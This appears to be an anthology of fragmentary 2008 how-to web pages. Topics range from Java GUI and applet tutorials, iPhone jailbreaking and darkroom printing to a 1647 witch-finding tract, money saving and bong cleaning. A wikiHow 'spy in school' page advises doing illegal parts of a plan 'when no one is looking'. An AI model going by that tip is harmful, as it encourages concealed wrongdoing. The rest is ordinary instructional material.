Before you fire up Eclipse, or whatever editor you use. Let's first brush up your mind by learning what GUI really is and howit is designed to work in Java. A GUI is a short term for Graphical User Interface.By making a GUI program, you can make your software have buttons, menus, text fields,textareas, file browser and much much more which isn't possible by a normal console driven Java Program. GUIs are mainly designed to work with complex programs.Such as, you could make your own Word Processor, Calculator and bunch of other coolcomputer softwares. Since it is always a good idea to learn while you are still interested, Ithink you should definitely spend more time learning GUI because in future you will be using it nonetheless.

GUI Hello Program

Ok, if you've read my another article called Hello Java, Then I am sure the output wasn't really that good. Seriously no matter how hardcore your program is, if it is just plain textno one will be interested in it. But if you have something colorful, with style, attitude or alittle bit exposure thrown in... then it will look very interesting. Our program will work like this.

You run the program.1.In the window you see two or three buttons.2.When clicked, each shows different types of alert messages.3.

Sounds very simple doesn't it? But trust me, this simple program is even more complex. Iwill have to go over some of the stuff so just bear with me.

In JAVA making a GUI program is very easy and doesn't require any extra files for your clients to download or for you to download. It all comes as a pack in the JRE, called Swing.

And throughout this tutorial, I will be using Swing Class library to make our super cool GUI Program (at least its better than Hello Java).

A JAVA GUI Program should be designed like the diagram below (at least it's what I think):

- main() - Frame-- Content Panel--- Buttons--- Text Areas--- Menus

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How to Spy in School - wikiHow http://www.wikihow.com/Spy-in-School

1 2 19/4/2008 2:51




How to Spy in SchoolThis article has been nominated for deletion with the reason of:

"Accuracy issues. Please refer to the discussion page for additionalinformation".

Please comment on the discussion page as to whether it meets our criteria for deletion.Continued edits are appreciated, but please do not remove this tag. This article will bereviewed at least 1 week after {{{date}}}.

Want to spy on your friends? Teacher or enemies? Read on to learn more!

StepsFirst, determine your mission. Do you want to find out if someone likes you? This is important, because otherwise you willnot know what to pay attention to.


Besides where you are, spying at school is basically the smae as anywhere else. The only difference is that people aleadyknow you (unless you are new at the school).


Dont dress in dark or "spy" clothes. Just wear what you would normally. One of the most important things is, be normal!Dont act unusual. If you do, somone will suspect you.


Find some trusted friends. Its not easy to be in 3 places at once!4.

TipsIf your plan includes doing something illegal, skip that part or make a new plan or do it when no one is looking, not evenyour teachers or the supervisors.

Do not burp,fart or sneeze loud while spying, if you do then act like everyone else - Blend in!

Do not go out spying when you are sick, you might vomit.

Only wear dark colored clothes.

Camouflage yourself if necessary.

Cover your tracks.

WarningsDon't let anyone see you, if they do they might blow your cover!

Blog this! Republish this entire article on your blog or website.

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Jailbreak Your iPhone - Wired How-To Wiki http://howto.wired.com/wiki/Jailbreak_Your_iPhone

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Jailbreak Your iPhoneFrom Wired How-To Wiki

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Want to run custom native applications on your iPhone? Want to have ultimate control over your ringtones? "Jailbreaking" is the necessary first step. More in-depth introduction is needed.

For Mac OS X

The following instructions are for gaining access to an iPhone ("jailbreaking") on Mac OS X. Windowsinstructions have not yet been written, please contribute to the wiki by placing them on this page.

Using iNdependence

1. Download iNdependence, the open-source application for gaining access to your iPhone. You will also need the most recent iPhone firmware from Apple. These free files are a 91MB download. If your computer doesn't recognize the files as a ZIP archive, append the extension ".zip" to the downloaded package then unzip it.

2. Make sure your iPhone is plugged in to your computer and active.

Page 132: The Instructional Capital volume I

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Hamster to Mongolia - Instructables - DIY, How To, pets, offbeat http://www.instructables.com/id/Hamster-to-Mongolia/

1 3 12/4/2008 6:43

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Hamster to Mongoliaby pixelinabitmap on Mar 31, 2008 in PETS & OFFBEAT email it!

intro Hamster to MongoliaA couple of months ago I acquired a Roborovski hamster. I caved in, despite swearing that I will never keep rodents again. Those little dark, moist eyes, like jet beads, are the thing that makes rodents so hard to resist for me, add in the comical little noses in constant motion, tiny, human-like hands, and soft, delicate, semitransparent ears covered with velvety fuzz, like flower petals, and you've got a powerful combination indeed. The cuteness level is on par with kittens here! This time what really reeled me in was the Roborovski's incredibly small stature. At the adult size of about 3" they are the world's smallest hamster. And voila, I brought the little fuzzy home.

Over the time that followed, I've learned two things. One: my little Hamham REALLY likes her wheel! And two: humans (i.e. myself), are infinitely more trainable than hamsters. All my attempts to hand-tame the new critter seemed to amount to was holding a desperately squirming little fuzzball as she first attempted to wriggle free, then emptied her cheek pouches of all the seeds she'd been hoarding there, in an attempt to become slimmer, and therefore more effective at wriggling free, then finally starting to chirp in terror and desperation, while peeing and pooping herself the whole time. Had I been a child, I would probably have happily ignored every sign of her distress, and, at some point, finally persuaded her that I wasn't trying to have her for lunch. However, having developed a bleeding heart as an adult, I couldn't stand torturing the poor thing for long. Result: one tamed human has restricted hamster-handling to a minimum necessary to maintain a clean cage. The Hamham had her revenge, too, running in her wheel so much every night, that it was sliding all around the cage and banging on the sides (and conveniently keeping me awake) until I finally figured out how to mount it on the wall of the plexiglass cage (at least that stopped the banging, though she still runs in it all night every night, and I can still hear it). Nowadays, before turning in, I look in on her, watch her bounce in her beloved wheel, and tell her: "That's right, run-a-way-way little Hamham! Quick! Run back home to Mongolia!"

That got me wondering: Roborovski hamsters hail from the Goby Desert and the surrounding areas. If her little wheel wasn't securely fastened to the side of her cage, could she run all the way to her native Mongolia? There are, of course, a few oceans in the way, probably a couple of mountain ranges, but what the hell, even "as the crow flies" (or hamster runs, as it may be), could she make it to Mongolia if there was a straight line path to follow, minus the obstacles?

Nothing to do for it, but figure it out.

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Hostile » Blog Archive » Creating a Starfield with Java http://sunjester.freepgs.com/blog/?p=21

1 3 11/4/2008 10:48

Creating a Starfield with Java

January 22nd, 2008 by admin | Posted in programming |

creating a starfield with a java applet

this tutorial will show you how to create a starfield in java, I will also add action events so we can see therandom number generator and starfield in action. this will require some knowlege of java before hand. itonly requires basic java though, not much involed, its pretty much basic… if you want to see the full codenow, its below…

import java.awt.*;import java.awt.event.*;import java.applet.*;import java.util.Random;

public class Game extends Applet implements ActionListener {Button myButton = new Button(”press me”);

public void init() {add(myButton);myButton.addActionListener(this);}

public void paint(Graphics g) {Random r = new Random();setBackground(Color.black);

for(int count=0;count<=200;count++) {g.setColor(Color.LIGHT_GRAY);g.drawOval(r.nextInt(200),r.nextInt(200),1,1);}}

public void actionPerformed(ActionEvent event) {repaint();}}

this code is only 27 lines long so it shouldnt be to hard to explain and implement to beginners to java. The first thing i want to explain are the import statements and what they are used for.

import java.awt.*;import java.awt.event.*;import java.applet.*;import java.util.Random;

the first 1, java.awt.* imports javas “abstract window toolkit” and all the packages underneath it. this willhandle the windows, and graphics for our application. the second one, awt.event, will handle our buttonand events that happend when our button is pressed. the third statement is to activate our applet instead ofsome normal hava console app. the fourth and final import is for our… random generator. duh. lol

my class is named “Game” even though this isnt a game, dont let it throw you off lol.

[code]public class Game extends Applet implements ActionListener {[/code]

Page 134: The Instructional Capital volume I

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How to Print B&W Photographs in a Darkroom: Parts of the Enlarger -... http://www.instructables.com/id/SKGVHFAFEAHE46R/

1 3 12/4/2008 6:52

This Instructable is one of 36 entries.help them win - tell a friend

How to Print B&W Photographs in a Darkroomby Weissensteinburg on Apr 8, 2008 in PHOTOGRAPHY email it!

step 4 Parts of the EnlargerBefore you do anything, scope out the enlarger. You're going to have a few different knobs and levers, and you'll need to know what each one does. Because all enlargers are different, I'll just tell you a few different parts there will be, and leave it to you to figure what each one does. This will help you feel much more comfortable when actually printing.

Focusing knob - this will move the bellows (and lens) up and down (closer and farther) from the negative to focus it.

Head knob - This knob will either loosen the head so you can slide it up or down (changes how large the picture is), orit will mechanically move the head up and down.

Aperture Ring - This ring should be located on the lens, and changes the aperture. If the enlarger is turned on, you willnotice the light get dimmer and brighter as you turn it.

There may also be a lever to raise or lower part of the head to give you access to the negative carrier. Some enlargersdon't require anything to be done before you can remove the carrier.

Negative Carrier - This goes between the lens and bulb, it's what carries your negative. Not much more to it than that.

The Timer

Timers can be different, but their purpose is always the same: to accurately control the exposure time of an enlarger.

There are generally two switches on a timer:

If both switches are turned on, the light remains on.If one of the switches (It does matter which one) is turned on, the enlarger will be on for as long as the timer is set to.

Having the light on continually is used for focusing your picture

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Daguerreotype Photographs t…Step 0, Pronunciation: "DUGARROW TYPE". My name isJonathan Danforth …by duckarrowtypes

How to develop a photo usin…Develop blueprint paper usingWindex. Grab a container Ordersome take-out and …by markgutierrez

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TheDiscovery of Witches:

InAnswer to severall QUERIES,

LATELYDelivered to the Judges of Assize for the

County of NORFOLK.

And now publishedBy MATTHEW HOPKINS, Witch-finder,

FORThe Benefit of the whole KINGDOME.


EXOD. 22.18.Thou shalt not suffer a witch to live.

Certaine Queries answered, which have been and are likely to be objected against MATTHEW HOPKINS, in his way of finding out Witches.

Querie 1.

That he must needs be the greatest Witch, Sorcerer, and Wizzard himselfe, else hee could not doe it.


If Satan’s kingdome be divided against it selfe, how shall it stand?

Querie 2.

If he never went so farre as is before mentioned, yet for certaine he met with the Devill, and cheated him of his Booke, wherein were written all the Witches names in England, and if he looks on any Witch, he can tell by her coun-

tenance what she is; so by this, his helpe is from the Devill.


If he had been too hard for the devill and got his book, it had been to his great commendation, and no disgrace at all: and for judgement in Phisiognomie, he hath no more then any man else whatsoever.

Quer. 3.

From whence then proceeded this his skill? was it from his profound learning, or from much reading of learned Authors concerning that subject?


From neither of both, but from experience, which though it be meanly esteemed of, yet the surest and safest way to judge by.

Quer. 4.

I pray where was this experience gained? and why gained by him and not by others?


The Discoverer never travelled far for it, but in March 1644 he had some seven or eight of that horrible sect of Witches living in the Towne where he lived, a Towne in Essex called Maningtree, with divers other adjacent Witches of other towns, who every six weeks in the night (being alwayes on the Friday night) had their meeting close by his

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Abiator's Reading: Blooms Set 05:04 ACTIVITIES for _Myths_ http://www.berghuis.co.nz/abiator/patana/5t/literacy/blooms/myths.html

1 2 13/4/2008 3:58


no audio

no set text

?Quizzes: n/a n/a

MythsRetold by various authors

Abiator's Reading:Blooms Set 05:04

ACTIVITIESTotal Marks: 18

Variety of textsAbiator's Active Classroom, http://www.berghuis.co.nz/abiator/


KNOWLEDGE - What are the facts1. Make a list of the main characters in the myth you have chosen. [1mark]2. Give the setting of the myth you have chosen. [1 mark]

COMPREHENSION - Show that you understand the information3. Write a brief outline of what your myth tries to explain. [2 marks]4. Criticise any three main characters from your myth. [2 marks]

APPLICATION - Using what you have read in the article5. EITHER:

(a) Make a wordfind (word search) puzzle containing 12 good quality wordsrelated to your myth. [3 marks]

(b) Paint a scene related to your myth on an A4-sized piece of paper. [3marks]

ANALYSIS - Organising information from the article6. EITHER:

(a) In your opinion, which events from your myth could not have reallyhappened? [3 marks]

(b) Use a Venn Diagram [What?] to compare and contrast any two main characters from your myth. [3 marks]

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GoldOre Photoshop Tutorial - Part 3 http://www.flash-game-design.com/tutorials/goldTexture-photoshop-tu...

1 2 9/4/2008 1:23

Flash Game Design

Tutorials Articles

Step 3.This is part 3 of this Photoshop tutorial. Next reduce the image in size to 200x200 and then apply the sharpen filter (filter > sharpen > sharpen) twice. You should end up with something like in image b). a) b)

Step 4.Duplicate the layer twice. Make the 2nd duplicate(top layer) invisible for the moment. Change the 1st duplicate's (2nd layer) blending mode to Screen and then set it's opacity to 70% (image a). Apply a gaussian blur ( filter > blue > gaussian blur), with a radius of 2.0, and you should end up with something like in image b). a) b)

Step 5.Make the top layer visible again, change it's blending mode to Color Dodge, and set it's opacity to 70%. And that brings us to then end of this Photoshop tutorial! :)

Photoshop CS3 Plug-InsFour great plug-ins for Adobe Photoshop CS2 and CS3

Photoshop textilePowerful Photoshop Plugins for Fashion & Apparel, Buy Now!

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How to Save Money - wikiHow http://www.wikihow.com/Save-Money

1 4 20/4/2008 2:15


How to Save Money

Saving money is one of those tasks that's so much easier said than done. There's more to it than spending less money(although that part alone can be challenging). How much money will you save, where will you put it, and how can you makesure it stays there? Here's how to set realistic goals, keep your spending in check, and pay yourself first.

StepsSet savings goals. For short-term goals, this is easy. If you want to buy a video game, find out how much it costs; if you want to buy a house,

determine how much of a down payment you’ll need. For long-term goals, such as retirement, you’ll need to do a lot moreplanning (figuring out how much money you’ll need to live comfortably for 20 or 30 years after you stop working), and you’llalso need to figure out how investments will help you achieve your goals.

Kill your debt first. Simply calculating how much you spend each month on your debts will illustrate that eliminating debtis the fastest way to free up money. Once the money is freed from debt payment, it can easily be re-purposed tosavings.


Establish a timeframe. For example: "I want to be able to buy a house two years from today." Set a particular date foraccomplishing shorter-term goals, and make sure the goal is attainable within that time period. If it’s not attainable, you’lljust get discouraged.


Figure out how much you’ll have to save per week, per month, or per paycheck to attain each of your savings goals.Take each thing you want to save for and figure out how much you need to start saving now. For most savings goals, it’sbest to save the same amount each period. For example, if you want to put a $20,000 down payment on a home in 36months (three years), you’ll need to save about $550 per month every month. But if your paychecks amount to $1000, itmight not be a realistic goal, so adjust your timeframe until you come up with an approachable amount.


Keep a record of your expenses. What you save falls between two activities4.

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REMODELING OVER TIMELearn how one homeowner renovated her entire home, budgeting for one major project a year.

Do you have an eye for style but a zero in your remodeling budget? You're not alone. When Amy Funk, right, became the owner of a ranch-style home that needed a little TLC, she didn't have much extra cash, but she began a whole-house makeover-saving up for and completing one project at a time.

Amy has spent an average of $10,000 each year. "The value of my house has practically doubled," she notes, "but I have not put twice my investment into it." Read on for her advice about working on a house over the long haul.

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aliciawash293935 wrote:

When we moved into our house 8 years ago we made a master plan for renovations. Every year we do one ortwo items on the list and by the time we hit 10 years the whole 4000 sf house will be complete. We have neverspent more than $10k a year, projects vary by available money. By makingthis timeline we actually plan for the next remodel. for example we moved the laundry room to the second floor into a closet, we just finished making the old laundry room into a mud room/utility room which will function as our kitchen when we remodel the kitchen next year, so we don't eat take out for months. Plus we do it ALLouselves so no labor $.3/26/2008 11:58 AM CDT

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The correct Exposure - a tutorial - Part 1: Shutter, Aperture and ISO

Cameras photography Tutorials

Determining the "correct" exposure for an image can be a challenging task. We could choose to simply let our camera decide for us, and use the fully automatic settings that are quite sophisticated and often do a reasonably good job. However, this also means to give away part of the creative process to your camera. I am writing this tutorial with the beginning photographer in mind. The principles outlined in this article should become a second nature to you. I

encourage you to practice and to ask questions. In many ways, this is like riding a bike. Once you learned how, you can focus your attention on your surroundings.

I am not advocating using the manual settings of your camera at all times. Instead, I am a big fan of the creative zone settings such as Aperture Priority Mode, Shutter Priority Mode and Program mode. I use these automatic modes 95% of the time and I rarely resort to Manual Mode.

Aperture settings determine the Depth of Field (how much of your scene is in focus). Landscape photographers often strive for a very large Depth of Field while Portraits often require a shallow Depth of Field. Being in control of the aperture, the photographer can direct attention and guide the viewer through the image.

Shutter speed controls how motion of the subject or your camera will look like in your pictures. A slow shutter will blur fast moving subjects and a fast shutter will freeze them.

The three exposure controls: Shutter Speed, Aperture, ISO

If all this sounds confusing and if you feel overwhelmed, you are in good company. There are too many degrees of freedom and too many choices to make, but you can become a master through practice.Technically, photography is nothing more than a method to capture light on your sensor or film. With exposure, the photographer is in control of the amount of light that reaches our sensor and of the sensor sensitivity (ISO).

Introducing ISO sensitivity

The ISO sensitivity (ISO rating, ISO speed) characterizes the sensor or film sensitivity to light. Formerly called ASA rating, digital cameras continue to use the same system introduced a long time ago. It is common to use the term "stop" in photography. One stop in terms of ISO refers to a doubling of our sensitivity. ISO 200 is twice as sensitive as ISO 100 and is therefore "one stop higher." In film photography, we would have to make a decision on the type of film needed before going out on a shoot. One of the great advantages of digital photography is the capability to change the ISO settings for each frame.

Use higher ISO settings with caution. High ISO film is wonderful for low light photography, but they have much more grain then low ISO films. A high ISO setting on your digital camera will also produce more noise in your image.

Modern SLR cameras have very low noise and I would not hesitate to use even higher ISO settings to "get the shot." Digital SLR cameras have less noise than point and shoot cameras at the same ISO setting, since their larger sensor means they are more light sensitive (a large window lets in more light than a small one).

Shutter Speed

The shutter is covering the film or sensor and only when the shutter-release is pressed, do we open the shutter for a pre-determined time to let light pass through our lens to the sensor. We also use "stops" to measure shutter speeds. Each stop doubles the time the shutter remains open and thus doubles the light sensitivity of our


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How To Spin Your Life Story | How To Do Things.com http://www.howtodothings.com/careers/how-to-spin-your-life-story

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By Mary Norton

How To Spin Your Life Story

For many, life is a series of quiet adventures and most people have a story to tell. However, most of

us have never really thought much about being a storyteller, about organizing our experience and

really thinking through what we have learned about ourselves, about our families…about life. We think

that unless there are great events with characters like Indiana Jones, no one is interested. Wrong.

Many great stories are about ordinary people doing ordinary things, but written in interesting ways.

When we write our own story, we really get a chance to look for meaning in small events and when

we learn how to tell the story, it helps others think about their own lives, too. Start with the following:

Start with your day of birth. Remember what your parents told you of the circumstances

around the event, data you have, pictures if you have them (memorable ones). Check the local

newspaper for that day in the archives on the Internet. There might be highly significant events

that happened that day.


If you are into astrology, look at your stars. Look at your animal sign in Chinese astrology.

Whether you believe any of this stuff or not, it gives you a different perspective and may trigger

some ideas. If you are averse to this, just don’t touch it.


Research the meaning of your name. Your parents thought through your name very carefully.

It embodies some navigation clues of what they thought your life should be. For many of us, it

was chosen with great care. Were you named after someone? Why? Who was it and what was his

or her journey like? Again…maybe some hints. All of these point to a navigation system to help

with the plan ahead.


Recall significant events in your life. Write about them, i.e. your first bicycle, your first date,

your first party, the prom, your first job, your wedding day, the birth of your children…whatever..

Include feelings, sensations, thoughts, people involved.


Remember people who have influenced you. Describe the role they have played in your own

growth. Who were your heroes and why? Who were the devils and how did you cope? Think of

conversations you had with friends, family, grandpa and grandma, schoolteachers and camp

mates. What did they mean to you then?


Write about life changes. Describe the significant turns you took, i.e. a move to a new place, a

new relationship or when a significant change took place. Describe it. Choose your own symbols

as they speak to you of your own experience. Try to find descriptive words for your feelings then.


Insert some remembered moments. The first smile you got from your child, the hug of

forgiveness from a long lost friend…


Include snippets of words people have said about you. Write about the impact of these

words on you.


End this life story with a celebratory paragraph, rejoicing in a life that has been lived well and looking

forward to greater things to come.


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How To - Install/Assemble: Assemble an Island 1 of 2- Do It Yourself http://www.diyideas.com/howto/InstallAssemble/island_1.html

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Skill level: Beginning woodworkerTime to complete: One weekendEstimated cost: $673


tape rule

circular saw (optional)

straightedge (optional)

fine-grit sandpaper



sea sponge



two dressers (model 598w—Whittier Wood Products,www.whittierwood.com, shown)

one quart latex primer

one gallon semigloss latex paint

stencil spray adhesive

black crafts paint

solid-core slab door, 36 inches wide

one quart wood stain (we used a translucent white stain)

polyurethane sealer

construction adhesive

Because we wanted the finished island to be 36 inches tall, the same height as the perimeter countertops, we used a circular saw to shorten each dresser leg by 2¼inches and sanded any rough edges. If you prefer a taller work surface, skip this step. Prime the dressers, allow to dry, then paint and let dry. Apply a second coat of paint and let dry.

Spray the stencil with adhesive, and attach it across the drawer fronts. Dab the sea sponge in the crafts paint, blot a few times on a rag, and pounce the paint on the stencil. Remove the stencil and let dry. Repeat on the other dresser, if desired. Attach the drawer knobs.

We trimmed the door to 45 inches tall and sanded the cut side. If you prefer a longer island, leave the door untrimmed. Apply the stain and let dry. Brush on polyurethane sealer (we used matte finish) and let dry. Repeat and let dry. Apply at least two coats; add more if desired.

Position the dressers as desired, and use the construction adhesive to attach the door to the dressers. * Place bricks or other heavy items on top to clamp the assembly while the adhesive cures overnight.

*Alternately, attach the door with screws driven from underneath or use L-shape brackets attached to the sides of the dresser for easier disassembly later, should you want to move the island.

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By Sylvie Leochko

Difficulty: Cost:

How To Use LeftoversTransform Them into Something New and Delicious!

You have just finished another meal. Like usual, you made too much. Of course, wasting such good

food is out of the question, but how can you serve these leftovers a few days in a row without boring

your family's tastebuds? Well, change what you can and reintroduce them to your family. There are

three ways to use the same leftovers, over and over, without encouraging your kids to desperately

seek friends' invitations to have dinner at their home rather than with you. How? Simply follow these

useful tips.

Save your mashed potatoes!

Take an egg and 1/4 cup of milk. 1.

Add a pinch of salt and pepper. 2.

Mix all the ingredients thoroughly. 3.

Preheat the oven at 350 degrees Fahrenheit. 4.

Lightly grease a cookie sheet or use a coating of cooking spray. 5.

Roll your leftover mashed potatoes into small balls, the size of a large marble up to the size

of a small bouncy ball. Take a resealable sandwich back and fill it up with some Cornflakes.

Seal the bag and crush them with a can or a rolling pin until it is crushed into small piece,

not into a powder.


Dip the balls into the liquid and cover them with the Cornflakes. 7.

Put them on the cookie sheet. Cook for 15 minutes. This time will allow them to be hot. 8.

Enjoy them with any meal of the day, even at breakfast time!


Use your boiled potatoes! Boiled potatoes may seem bland after a few days, but why not

transform them into something new and delicious? They actually make delicious breakfast

potatoes when pan-fried. Add some dill, salt, pepper and some garlic, and your tastebuds will beg

for more. Something that started as a dinner side dish ended up transforming breakfast into a



Mix the old with something new! Let's say you have a lot of leftover meatloaf. Well, focus on

adding new side dishes, as they will add some variety and will delight your guests. Instead of the

mashed potatoes and peas that you served last night, trade them in for a nice garden salad and

some rice. Changing the face of your plate will delight your family while it will also prevent boring

them with the same leftovers, over and over.


Chicken, turkey and ham are best friends with creativity! These three types of leftovers

make variety easy. Serve them up in a different way every night. Casseroles, sandwiches, soups

are only a few ways to use these wonderful leftovers. Use them in omelets in the morning, a

sandwich at lunch and a tasty soup in the evening to accompany your main course.


Why facing boredom by reheating leftovers when you can either add something to them or transform

them into something new and delicious. Free your imagination and delight family and guests with the

tasty results while avoiding expensive and unnecessary waste. Enjoy leftovers by seeing them in a

new light!


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Instructions for Using Crutches - FootPhysicians.com http://www.footphysicians.com/footankleinfo/crutches.htm

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Crutches: A "How-To" Guide

Sizing Your CrutchesWalking with CrutchesManaging Chairs with CrutchesManaging Stairs Without CrutchesImportant Rules for Safety and Comfort

It takes some coordination to get around on crutches. To make sure you use your crutches correctly, please read these instructions and follow them carefully.

Sizing Your CrutchesEven if you've already been fitted for crutches, make sure your crutch pads and handgrips are set at the proper distance, as follows:

Crutch pad distance from armpits. The crutch pads (tops of crutches) should be 1.5" to 2" (about two finger widths) below the armpits, with the shoulders relaxed.Handgrip. Place it so your elbow is flexed about 15 to30 degrees—enough so you can fully extend yourelbow when you take a step.Crutch length (top to bottom). The total crutch length should equal the distance from your armpit to about 6" in front of a shoe.

Walking with Crutches (Non-Weight-Bearing) If your foot and ankle surgeon has told you to avoid ALL weight-bearing, it is important to follow these instructions carefully. You will need sufficient upper body strength to support all your weight with just your arms and shoulders.

The Tripod Position

The tripod position is the position in which you stand

when using crutches. It is also the position in which you begin


To get into the tripod position, place the crutch tips about 4" to 6" to the side and front of each foot, then stand on your "good"

foot (the one that is weight-bearing).

To walk with crutches:

Begin in the tripod position—and remember, keep all your weight on your "good"(weight-bearing) foot.


Advance both crutches and the affected foot/leg.2.Move the "good" weight-bearing foot/leg forward (beyond the crutches).3.Advance both crutches, and then the affected foot/leg.4.Repeat steps #3 and #4. 5.

Managing Chairs with Crutches

To get into and out of a chair safely:

Make sure the chair is stable and will not roll or slide—and it must have arms and back support.1.Stand with the backs of your legs touching the front of the seat.2.Place both crutches in one hand, grasping them by the handgrips.3.Hold on to the crutches (on one side) and the chair arm (on the other side) for balance andstability while lowering yourself to a seated position—or raising yourself from the chair if you're


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How to Step By Step Guide to Becoming An Actor or ActressBy kortneerumph

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A career in the tinsel town is what many aspire for, but few pursue. If you were to observe those few people closely you may see a striking similarity among everybody in terms of their attitude, hard work and commitment. It is true that anacting career requires more time and effort than is normally needed, but when one is willing to go that extra mile with all their will power and might, there is no stopping the fame and fortune the job brings along with it. Not all actors areborn performers and not everybody was given a red carpet welcome when they arrived to the business. You would find it hard to believe that most of the leadingstars of Hollywood got their ticket to success after a lot of tears, toil and turmoil. If I were to tell you that Madonna had to work as a counter girl at Dunkin Donuts(source: careerbuilder.com) and Sharon Stone kicked off working at McDonald's(foxnews.com) you may find your jaw dropping. But this is the reality and the essence of this reality is that everybody needs to start somewhere. Whilestarting is one thing it is a matter of greater consequence how you proceed toward making your dream of becoming an actor come true. For this, one needsto do a lot of smart work along with a great deal of hard work. When I say smart work, it means a well researched, meticulously planned and tried out route which you can adapt to suit yourself to reach the desired goal. And it is smarter work when somebody has already done such ground work and you simply follow the guidelines and increase the probability of your success by leaps and bounds. I have complied below after carefully considering my several years of experience, a step by step guide of becoming an actor. Read on to know the right formula for becoming a hit in the glitter world sooner than you would have expected.

Things You’ll Need:

A humble attitude, charisma, and headshots along with a resume.

1. All actors must start small.If you need to get into acting, first get going. Don't wait for you to be "discovered" by an agent or director for a multi million big buck project.

These are just stories that the media writes to make money. In reality no one is actually discovered. If you were to look closer you will notice that those who were discovered had some considerable acting credit to their names earlier. So,the primary step is to just start off with whatever opportunity that comes your way.

2. Every popular actor started off at the bottom and worked up.Most of the actors you find today would have started small and worked their way up to fame and fortune.

3. Beginning actors don't need talent agents.Even talent agents have their choice in taking in their clients. As a beginner if you were to go hunting for a talent agent, you would be

wasting time. Rather, I suggest you concentrate on getting roles yourself for a beginning. To do this, all it takes is perseverance and networking.

4. Locate quality jobs on your own.Who can know better about you than yourself? You will know your strengths and weaknesses like nobody else does, so locate quality jobs

yourself while at the early stages of your acting career.

5. New actors should start looking for jobs locally.Don't just hop over to Hollywood the minute it strikes you that you have decided to become an actor. There are hundreds of smaller cities where

the industry needs talent and where there are only a fewer people. Start locally and work your way to Hollywood.

6. The best experience is to perform in front of a crowd.If you want an acid test of your talent, do a performance in front of a crowd. This is the best experience that you can get and if they are

impressed and applaud every time you perform, there's no stopping you.

7. Build your resume.After you have enough acting credits to your name, build a resume that is impressive and informative. Add each new performance to your acting

resume and keep it updated and handy. Draft an equally impressive cover letter to go along with this resume and start applying to all good acting jobs that you

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How to Clean Burned-On Food from Pots Without ScrubbingBy Sandy Smith

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If you’ve ever tried scrubbing burned-on tomato soup or oatmeal from thebottom of a sauce pot, you know that you’ll run low on elbow grease and wearout your scrubbing sponge long before you’ll see the bottom of that pot. Happily,here’s a method you can try the next time you get sidetracked in the kitchen andfind yourself with a scorched-on mess to contend with.

Things You’ll Need:

Water2 tablespoons baking soda1 to 2 tablespoons white vinegar (optional)Mild dish detergent

Use a wooden spoon or spatula to remove as much of the loose foodfrom the bottom of the pot as you can.

Fill the pot with approximately 2 inches of water. Add 2 Tbsps. of bakingsoda to the water and stir until dissolved. Place the pan over medium-highhigh and bring to a boil.

Reduce heat once the water is boiling and let simmer for 10 to 15minutes. Turn off heat and allow water to come to room temperature in the pot.

Pour the water out When it is cool and wash pot as you normally would,with a mild dish detergent. The burned-on food residue should lift out easily now, without scrubbing. It may peel off the bottom of the pan in

shreds or may float to the top in one piece.

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If you have an especially thick layer of burned-on food, try adding a tablespoon or two of white vinegar to the water before stirring in the baking powder.

The baking soda and water mixture may bubble up and overflow the sauce pot, particularly if vinegar has been added to the water. If it starts to foam, turn down the heat and remove the pot from the burner for a couple of seconds to allow foam to dissipate.

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How to DIY your own carbon fiber wallpaper?

11 03 2007

What you need to have: Adobe PhotoshopPS: ? key for Mac users / CTRL key for Windows users

Prepare the texture pattern

(Download the ready made texture 1 and texture 2 if you are too lazy to create your own.)

1. In Photoshop, create a new document by pressing ?N / CTRL-N. Set the size at 20×20 pixel.

2. Zoom in (z) few step so that you can work on it easily. Choose Rectangular Marquee from the toolbar

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How-To GuideUnderstanding the Press

The press can be your ally and your foe. They can help you promote your state project, generatepublic and private support, and rally community opinion behind you. Or, they can be overly criticalof your efforts and make it challenging to generate public support. The press communicates viaprint (including newspapers and magazines) and broadcasting (including television, cable, andradio); it's referred to collectively as the media. The most important thing to remember about themedia is that each news organization has its own style and ideas on what to report. The folkscharged with the responsibility of maintaining this editorial focus are called editors. It's the editor'sjob to monitor and control the content and subject matter of all the stories. In smallerorganizations, one person may split the task of editor and reporter. Larger ones can afford a fullstaff complete with a flurry of titles, subtitles, and more. You can get a sense of where a journalistis on the organizational ladder by paying attention to his or her title. Here are some generalizeddescriptions for titles you may come across that deal specifically with print.

The publisher is the financial and organizational center. Usually he or she has no directnewsroom responsibility; however, publishers can be terrific allies once you establish a goodrelationship.The title editor-in-chief or simply editor connotes a person in charge of all aspects ofreporting the news. He or she usually oversees newsroom operations and editorialschedules.The title senior editor or editor may indicate the manager of a section, like the Lifestylesand Business sections of your local newspaper.An associate editor is often a reporter assigned to cover certain topics or events. If apublication does not use senior editors, then the associate editor may be the personentrusted with senior editor-like tasks.The gofer of the newsroom is the assistant editor, who reports directly to his or her senioreditor, editor, or editor-in-chief. Assistant editors may help others sort through all the pressreleases and flag those that meet certain criteria.

In broadcasting, some titles stay the same, but others change. Here are some generalizeddescriptions for individuals who work in broadcast media.

A producer is like an editor-in-chief and may also have the responsibilities of a publisher.The assignment editor, especially in television, is likely your key contact. The assignmenteditor has control over the flow of all information and assignments. If you are holding atimed event, you may contact the assignment editor as little as hours before your eventand, if you can get him or her interested enough, the assignment editor may send out acrew.Associate producer and associate editor are titles used liberally to describe a person whohelps the producer or assignment editor. Sometimes this person is a specialist in aparticular topic (such as education or technology). This is a good person to contact forgeneral coverage of your organization

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How To Clean a Bong | eHow.com http://www.ehow.com/how_2239953_clean-bong.html

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How to Clean a BongBy eHow Home & Garden Editor

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A bong can be difficult to clean because of the shape, design and hard to access interior. Dirty bongs look bad and exude an unpleasant odor that ruins the taste. Some basic bong maintenance will fix the issue.

Empty the water from the bottom of the bong into the toilet bowl instead ofthe sink. The bong water is full of resin and has a bad smell.

Refill the bong with hot water. Put your hand over the opening at the topof the bong to seal it. Hold the bong horizontally and shake it back and forth vigorously. Empty the water into the toilet again and flush.

Pour a few inches of 91% rubbing alcohol into the bottom of the bong.

Add several tablespoons of salt, sea salt or uncooked rice. The salt or therice acts as an abrasive and scrapes the sides of the bong as the alcohol breaks down the resin.

Place your hand over the top of the bong again. Holding the bonghorizontally, give it another vigorous shaking. Turn the bong over and around while you shake. Make sure you reach all surfaces. Empty the

contents in the toilet and flush.

Put a few inches of clean, hot water in the bong and shake it again. Nowyou can dump the water out in the sink because the residue should be all gone.

Spray the bong inside and out with an all-purpose cleaner. Use one that isscented with lemon or lime to remove the bad smell and taste from the bong. Rinse with clear water, and then set the bong upside down to allow

all water to drain.

Pro Marble/Stone PolishGuards against moisture, stains and dirt. Used in leading hotels.www.pinnaclesupplies.com

Clean Your ColonColon cleansing kit. Gently removes toxins in your body. View photos.MarthaVolchok.com

